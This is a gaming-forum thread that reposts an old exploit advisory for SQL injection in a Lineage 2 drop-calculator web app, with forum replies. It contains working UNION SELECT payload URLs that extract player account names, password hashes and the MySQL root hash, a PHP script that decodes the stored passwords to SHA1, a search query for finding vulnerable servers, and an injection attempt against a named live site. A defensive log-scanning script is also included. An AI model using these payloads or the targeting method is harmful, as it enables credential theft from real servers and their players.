
[Exploit] SQL Injection!


caesar4l2


#==============================================================================================
#  Title: Michelle's L2J Dropcalc
#  Version: <= v4
#  Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm
#
#  Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk)
#
#==============================================================================================
#  SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
#  http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[sql]
#
#  Example:
#
#   Obtain a player username:
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
#   Obtain a password for that username (*** encrypted): 
#    * only valid if loginserver and gameserver are in the same machine
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"
#
#
#  Bonus:
#   
#   Obtain MYSQL Password (encrypted):
#    *only valid if the script is executed with root accounts.
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#
#   *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file
#
###############################################################################################


<--------- Beginning of PHP Script --------->

<style type="text/css">
<!--
.style3 {font-size: 24px}
.style1 {color: #CC0000}
-->
</style>
<?php
echo("<title>L2J Pass Decoding - POC</title>");
// L2J stores a password as base64(SHA1(password)). Strip the base64 layer and
// print the raw 20-byte digest as hex. The field is empty until the form is posted.
$pass = isset($_POST['decode']) ? $_POST['decode'] : '';
$unpass3 = base64_decode($pass);   // raw SHA1 digest bytes
$unpass2 = bin2hex($unpass3);      // hex form; equivalent to unpack("H*", ...)[1]

echo("<span class=style1><b><u>Decoding Password</u></b></span>");

// escape user-supplied and binary values before echoing them into the page
echo("<br><b>Base 64:</b> " . htmlspecialchars($pass) . "<br>");
echo("<b>Unpacked:</b> " . htmlspecialchars($unpass3) . "<br>");
echo("<br><b>SHA1:</b> $unpass2<br>");
?>
<form name="form1" method="post" action="">
  <div align="center">
    <input type="text" name="decode">
    <input type="submit" value="Decode">
  </div>
</form>
<br><br><br><center><i>Created by Codebreak</i></center>

<------------- End of Script ------------->

# milw0rm.com [2007-01-31]

c/p from milw0rm; note that I haven't made it work. If someone makes it work, please share the how-to.

I've tried on www.cfl2.eu but I think I'm missing something... dunno what, btw!

The guide is in the code tag; however, I report it here:

This exploit can be used from a web browser only on servers that support and have Michelle's L2J Dropcalc running:

#  SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
#  http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=
#
#  Example:
#
#   Obtain a player username:
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
#   Obtain a password for that username (*** encrypted):
#    * only valid if loginserver and gameserver are in the same machine
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"
#
#
#  Bonus:
#
#   Obtain MYSQL Password (encrypted):
#    *only valid if the script is executed with root accounts.
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"

 

As you can see it's pretty easy to do, I just can't get it to work; hope someone can help.

ASAP I've decreased the post to 500 :P

EDIT: decreased again, please someone try this...

 

caesar

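From the defender's side, here is an added example (not from the post or the milw0rm advisory) that scans web-server access-log lines for the shape of request described above: an `itemid` value that is not a plain number and carries UNION ... SELECT. It assumes Apache combined log format, inspects every `itemid` occurrence because the advisory URL sends the parameter twice and PHP's $_GET keeps the last copy, and runs over constructed sample lines.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original thread): two benign
# dropcalc lookups, then two requests shaped like the advisory URLs, one with the
# %20-encoded spaces that IE7 produces and one using '+' encoding.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2007:10:00:01 +0000] "GET /dropcalc/i-search.php?itemid=&username=bob&token=abc&langval=lang-eng.php&server_id=0&skin_id=0&itemid=57 HTTP/1.1" 200 812
10.0.0.5 - - [31/Jan/2007:10:00:02 +0000] "GET /dropcalc/i-search.php?itemid=1234&username=bob&token=abc HTTP/1.1" 200 640
10.0.0.9 - - [31/Jan/2007:10:05:13 +0000] "GET /dropcalc/i-search.php?itemid=&username=bob&token=abc&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1%20UNION%20select%20null,account_name,null,null,null,null,null%20from%20characters%20where%20char_name%20=%20%22juda%22 HTTP/1.1" 200 910
10.0.0.9 - - [31/Jan/2007:10:05:40 +0000] "GET /dropcalc/i-search.php?itemid=-1+union+all+select+null,password,null,null,null,null,null+from+accounts HTTP/1.1" 200 905
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def suspicious_itemids(url: str) -> list[str]:
    """Return every itemid value in the URL that is not a plain integer."""
    # parse_qsl keeps duplicate keys and decodes both %20 and '+' to spaces.
    # The advisory URL sends itemid twice and PHP's $_GET keeps the last copy,
    # so every occurrence is inspected rather than only the first.
    values = [v for k, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)
              if k == "itemid"]
    return [v for v in values if v != "" and not re.fullmatch(r"-?\d+", v)]


def classify_line(line: str) -> tuple[str, str] | None:
    """Map a log line to (client_ip, reason) if it abuses i-search.php's itemid."""
    m = REQ_RE.search(line)
    if not m or "i-search.php" not in m.group(1):
        return None
    bad = suspicious_itemids(m.group(1))
    if not bad:
        return None
    reason = "union-select" if UNION_RE.search(bad[-1]) else "non-numeric"
    return (line.split()[0], reason)


def scan(log: str) -> list[tuple[str, str]]:
    """Run classify_line over every line and keep the hits."""
    return [hit for hit in map(classify_line, log.splitlines()) if hit]


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

A non-numeric `itemid` that carries no UNION keyword is still reported (as "non-numeric"), since the parameter is an integer lookup key and anything else is worth a look.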

omg 1000 posts ... n/c xD

Keep spamming n/c, you will see ;)

XxRxX, you know how SQL injection works, no? If you don't have a bad memory, there was an explanation somewhere on the forum.

@caesar4l2

Anyway, give us a mini guide on how to use it ;P If this even works on 1 server I think you could be rewarded.

 


That's ancient. Just check the release date.

2007-01-31

 

Plus, it's for very specific L2J servers with a web server that will allow SQL injection. Too specific exploit... don't think it's gonna work anywhere. For a successful SQL injection, you must craft your own queries, those c/p stuff won't work unless it details on which application this is used for and what version... very, very specific.



 

I think that if the server you play on isn't too customized and the GMs are a little bit "stupid", the trick is easy to do.

For example, the server I tried is using l2jfree, so in place of "name" I must put "char_name", as shown in the characters.sql table.

And yes, it's old, but Michelle's L2J Dropcalc is still at the same version (4, at least for the server I mentioned in the 1st post).

So that's it, no one wants to try? XD


Well.. if you google for "inurl:i-search.php dropcalc" you'll find a few servers using it... ;)

Not gonna try it, I don't like L2J servers anyway... but a few servers still use it, maybe it'll still work..



 

Results 1 - 7 Of 7

xD well if you say this is useless...

m.. ok then, if you find a server just tell us xD


Almost all chronicles; the server I'm trying is Gracia and the dropcalc version is still v4, so compatible with this milw0rm --> however I'm not that experienced with SQL injection. I've tried this link (injection):

 

http://dropcalc.cfl2.eu/i-search.php?username=[myuser]&token=[mytoken]&langval=0&server_id=1&skin_id=0&itemid=-1%20UNION%20select%20accout_name%20from%20characters%20where%20char_name%20=%20"juda"

Still nothing, the page has been loading for like an hour lol (the %20 are spaces; Internet Explorer 7 writes them like that lol).

